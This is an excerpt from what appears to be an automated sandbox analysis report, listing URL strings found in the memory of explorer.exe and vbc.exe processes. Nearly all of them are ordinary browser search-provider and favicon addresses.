Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: vbc.exe, 00000004.00000002.2171469708.0000000002281000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: vbc.exe, vbc.exe, 00000005.00000002.2159504550.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2161211569.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2163492264.0000000000A62000.00000020.00020000.sdmp String found in binary or memory: http://www.churchsw.org/church-projector-project
Source: vbc.exe, vbc.exe, 00000005.00000002.2159504550.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2161211569.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2163492264.0000000000A62000.00000020.00020000.sdmp String found in binary or memory: http://www.churchsw.org/repository/Bibles/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
